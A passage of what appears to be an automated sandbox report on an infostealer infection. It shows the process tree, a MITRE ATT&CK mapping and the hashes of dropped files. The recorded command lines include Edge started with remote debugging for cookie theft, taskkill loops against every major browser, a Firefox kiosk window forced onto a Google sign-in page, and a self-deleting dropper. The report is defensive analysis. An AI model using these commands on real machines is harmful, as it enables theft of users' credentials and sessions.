      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:5716
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffad974f208,0x7ffad974f214,0x7ffad974f220
        5⤵
        
        PID:3472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,4901956852166322804,1455537946407431389,262144 --variations-seed-version --mojo-platform-channel-handle=2284 /prefetch:3
        5⤵
        
        PID:4572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,4901956852166322804,1455537946407431389,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:2876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,4901956852166322804,1455537946407431389,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
        5⤵
        
        PID:5644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3572,i,4901956852166322804,1455537946407431389,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,4901956852166322804,1455537946407431389,262144 --variations-seed-version --mojo-platform-channel-handle=3696 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5568
- - C:\Users\Admin\AppData\Local\Temp\10238920101\c182c36c7f.exe
    "C:\Users\Admin\AppData\Local\Temp\10238920101\c182c36c7f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5244
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3488
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:860
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3544
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2676
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3740
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {cb397c3d-8a55-4033-ad0f-c960340ffe1b} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:4508
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {c2fe9c26-9544-4cb5-acb2-92696adf25b2} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:4864
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3836 -prefsLen 25164 -prefMapHandle 3840 -prefMapSize 270279 -jsInitHandle 3844 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3848 -initialChannelId {0bc16197-e90b-4bfd-a762-e79809d5601f} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:4036
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4024 -prefsLen 27276 -prefMapHandle 4028 -prefMapSize 270279 -ipcHandle 3872 -initialChannelId {dd329e0b-8209-4989-bcf6-3e6efe61a34a} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:908
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1652 -prefsLen 34775 -prefMapHandle 1616 -prefMapSize 270279 -jsInitHandle 1620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1644 -initialChannelId {5a478ed4-32d9-4abc-8756-4ff39d05fcdb} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:2836
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5180 -prefsLen 35012 -prefMapHandle 5184 -prefMapSize 270279 -ipcHandle 1624 -initialChannelId {c0409d35-5edb-4fc1-b3c0-937fe7baf50a} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:5436
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5388 -prefsLen 32900 -prefMapHandle 5392 -prefMapSize 270279 -jsInitHandle 5396 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5404 -initialChannelId {93d1afdc-6544-4b80-96f5-f82644e5ee98} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:4576
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32900 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5448 -initialChannelId {05dc3aab-3dbc-4c79-bb2d-81bc9b7df504} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:1668
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5820 -prefsLen 32952 -prefMapHandle 5824 -prefMapSize 270279 -jsInitHandle 5828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5836 -initialChannelId {7edcdb60-c5c5-44be-93dd-e44b04ceb2df} -parentPid 3740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:4844
- - C:\Users\Admin\AppData\Local\Temp\10238930101\df0bb5d7c6.exe
    "C:\Users\Admin\AppData\Local\Temp\10238930101\df0bb5d7c6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5336
- - C:\Users\Admin\AppData\Local\Temp\10238940101\5c15ee7bad.exe
    "C:\Users\Admin\AppData\Local\Temp\10238940101\5c15ee7bad.exe"
    3⤵
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\10238940101\5c15ee7bad.exe
      "C:\Users\Admin\AppData\Local\Temp\10238940101\5c15ee7bad.exe"
      4⤵
      PID:6720
- - C:\Users\Admin\AppData\Local\Temp\10238950101\0dac89f292.exe
    "C:\Users\Admin\AppData\Local\Temp\10238950101\0dac89f292.exe"
    3⤵
    PID:6388
- - C:\Users\Admin\AppData\Local\Temp\10238960101\ebe728292a.exe
    "C:\Users\Admin\AppData\Local\Temp\10238960101\ebe728292a.exe"
    3⤵
    PID:3872
- - C:\Users\Admin\AppData\Local\Temp\10238970101\2a08d969a3.exe
    "C:\Users\Admin\AppData\Local\Temp\10238970101\2a08d969a3.exe"
    3⤵
    PID:7044
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10238970101\2a08d969a3.exe"
      4⤵
      PID:7152
- - C:\Users\Admin\AppData\Local\Temp\10238980101\aa2112ab3b.exe
    "C:\Users\Admin\AppData\Local\Temp\10238980101\aa2112ab3b.exe"
    3⤵
    PID:7020
- - C:\Users\Admin\AppData\Local\Temp\10238990101\UD49QH6.exe
    "C:\Users\Admin\AppData\Local\Temp\10238990101\UD49QH6.exe"
    3⤵
    PID:2408
- - C:\Users\Admin\AppData\Local\Temp\10239000101\zY9sqWs.exe
    "C:\Users\Admin\AppData\Local\Temp\10239000101\zY9sqWs.exe"
    3⤵
    PID:15096
  - - C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
      4⤵
      PID:6612
- - C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe
    "C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe"
    3⤵
    PID:15944
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe" & exit
      4⤵
      PID:12952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        Delays execution with timeout.exe
        
        PID:13000
- - C:\Users\Admin\AppData\Local\Temp\10239020101\HmngBpR.exe
    "C:\Users\Admin\AppData\Local\Temp\10239020101\HmngBpR.exe"
    3⤵
    PID:8360
  - - C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
      C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
      4⤵
      PID:8600
    - - C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        5⤵
        
        PID:8680
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        
        PID:8732
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        
        PID:13496

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:2304

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 748 -ip 748
1⤵
PID:2000

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5256

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2788

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6696

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6924 -ip 6924
1⤵
PID:15232

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:6492

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:6548

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:19072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 8092 -ip 8092
1⤵
PID:14724

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4404

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:17836

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:17828

C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
1⤵
PID:17696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\2noh4ekngv.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\3o8y5\a1no8g

Filesize
6KB

MD5
8658974d9a806330132cf868ab5c7357

SHA1
7e1fe3db3222ae1f32a7f1210a07d8b0e2e0b26f

SHA256
c841d6aaac372a6197564c75a838994c6e4805c6329e440e6d99d29ef544b06c

SHA512
d331403938446c64c2359d73a353e81641fa15e83ad36657fce55e16c8797cfdbf6113f255f3c74daf949dbb0846ab45e924a712e6496da898bc15d077400e2d

Download Submit
C:\ProgramData\3o8y5\j5fk68

Filesize
228KB

MD5
0eb62df25eb1c343be4f6eb466392320

SHA1
07c31e36dd67d4d09126e16c3d905c870d89b7b8

SHA256
7f5fdf3a6232f414899aae2d05d7445835a058bc15e61ecd4b800aaaee49fabf

SHA512
cb55aa8ff10d8497f5aa46a4366da39a77e21a5d1455e6340ba72b2767bcf612f3ddd934b9a438c5d452778bb3321a52b89c2404bd336b32f22d0927b371487b

Download Submit
C:\ProgramData\BFHDAEHDAKECGCAKFCFI

Filesize
6KB

MD5
a553fe6e3ffc531ae3f8842f04b95f5b

SHA1
8762849a9c888a733afab4334b4eabb7c23dd41d

SHA256
c707597d811ea63ee9a090ceb236d80ac47737f88b5d66a7d47b4660939b8412

SHA512
62e6fdc1f201b4134998a7af54401ffc445e75b852e260a0a8a3a1f66cbce8f8963011c1ad6b38529e88c02b8f0c985fa4e2436daaa921d8adcb0371a2eb8321

Download Submit
C:\ProgramData\BKJJJDHDGDAAKECAKJDA

Filesize
56KB

MD5
1c832d859b03f2e59817374006fe1189

SHA1
a4994a54e9f46a6c86ff92280c6dabe2bcd4cc42

SHA256
bb923abf471bb79086ff9ace293602e1ad882d9af7946dda17ff1c3a7e19f45b

SHA512
c4d3be414fa5dd30151cde9f6d808d56c26b031ff3f6446d21a15d071053787b6ba337b12909a56af7bb420f858dba5213f08e64ca9f836f52c98a18762b4bef

Download Submit
C:\ProgramData\HCFCFHJDBKJKEBFHJEHI

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\ProgramData\JEBKEHJJDAAAAKECBGHDAAAFCG

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\KKKEBKJJ

Filesize
130KB

MD5
6bb0a66da2c1b52808ddc385380a5092

SHA1
7511d0ab76a03aded6ddcd146de09d8f3455dea7

SHA256
d31ba23320d632a70706a585ad757b8607788e3ba564b86a586a7cc8d294641d

SHA512
9e6777eda7a63b97f17a7699bb167cd39b54d8abb109eb905e7474a55d16aa8df31a29269ba798e809c134057e412eef372564b2ae6b780e217405db25097ab1

Download Submit
C:\ProgramData\d2dbi5pph4.exe

Filesize
464KB

MD5
fd9ad7a02f77e72ec3b077293dd329c3

SHA1
e6a9f93d2f282d198392956bbbf3df832be269a6

SHA256
e0244bd6e41657defabe82a544c6eeedf4ca7ba48dc8c70f4ec808980ae27786

SHA512
e4901b99b4cd48ed84f17501b146565b1036af918a7408e6460c82db3a6b56babfb78ec3fdffa9393853b272a757e9a18ba280791b5965b4c74d3589920bb45a

Download Submit
C:\ProgramData\dt0r1db1ny.exe

Filesize
575KB

MD5
f1fd0248cc742ba94edce47043b2b827

SHA1
2e8db5d05d34df5340be1ccc5b2cb7f1d07e0c26

SHA256
3517e38cd4c9ecb63b50498ebe837e870374f7e8bd9a4c8b7584f6e590c6b15d

SHA512
1ac4e15c35aa3c2fa45cbde3c94d8adbdbe0679e6f143fe86233397c1d1bef1c50d36f94954ca1b51af5f3be55063d6e34a85d51535e79dd319f2e689313b38c

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Temp\hjczKo0vM.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
13e85db7ab7bd0131b6d7b372eb6b3cb

SHA1
5bd031c1d79faee9f5b180576fb2ba73afd236a9

SHA256
96bf5616e02db2a7d71c4eb64ee4bf0ca8a06700e34ffa47bdc9c02f97092e20

SHA512
63e735544156689c62d6d5cffe428e6cf749066239e69dae910f08b89aa9f87efbeaf9ba5fa16d2644d16478ee854903270d4e330ddf89ea1bae6d54c98cb029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\e28e1b6f-6865-4a03-a5d3-0052365882a2.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
779f1dc46d4aec658c0d0c750aef10d2

SHA1
3b6c84d02b65770809aa488c9229475c7076775f

SHA256
76ba6b727326e2f2d9811e45c8302bf8b0245ffc67b07cd2080bceaef20a9038

SHA512
73f8e9b7dae9bff22940df9e5fb1df92f64d853a731a0804deb2aa4702c861b2a6c3cb8dc0a1ce40a09cd0338d19f3dd6ce3f0369c463facce640ce6bb82e3d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
998db8a9f40f71e2f3d9e19aac4db4a9

SHA1
dade0e68faef54a59d68ae8cb3b8314b6947b6d7

SHA256
1b28744565eb600485d9800703f2fb635ecf4187036c12d47f86bbd1e078e06b

SHA512
0e66fd26a11507f78fb1b173fd50555dbd95b0d330e095cdd93206757c6af2780ece914a11a23cd4c840636a59470f44c6db35fa392303fb583806264e652016

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
b8af007a7546ea5bc1e0609f9fc28e74

SHA1
20ac16cc0eb86b3fe36c2615af06d8971f904dbc

SHA256
fb0241ca22e77d83bc7b1c686dcfa604ee7aee445b20a3abd080582d832e3d66

SHA512
4c2d9beab96ef9809d24168a7b129ac1d950291b27d9cf0b98a5f48747bbf07c9277e6006c1a31acb28dd8c1eeaabe8c2f2567dc8eab9d4968d7ca49cefd81bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
b10ba2623322f7f7866b86ad48b5d194

SHA1
c6d45d7802ffdfbdef409195c0456af26299a079

SHA256
d831123b55071295082f97b656d490fee9ba585108756cc973860cf318e62e8e

SHA512
ffc6ed5930fbcfd9cb38f451c999b85a084db1212bc92f44530312beaedbc65a5a4ae2324968eb194717a42c4511b2efb609b5268f3b567325b84d8b49f6a6d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
a81729312e24a5c62c350837bbaab1f0

SHA1
fb806b9b3da26d180760a32ef3bee85fbc9b5439

SHA256
7189b82866364f3c3f4ae60544c724b160cd01102daa9a14d8b3cf46df556091

SHA512
bc54f34dd6216160896cb24a700fa97d4de71857e0387c588010a2952ae7af26a978f5516b8ea9dc3b917791b5568ab9a78cb5e2dc06713d72bd564c812e9a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
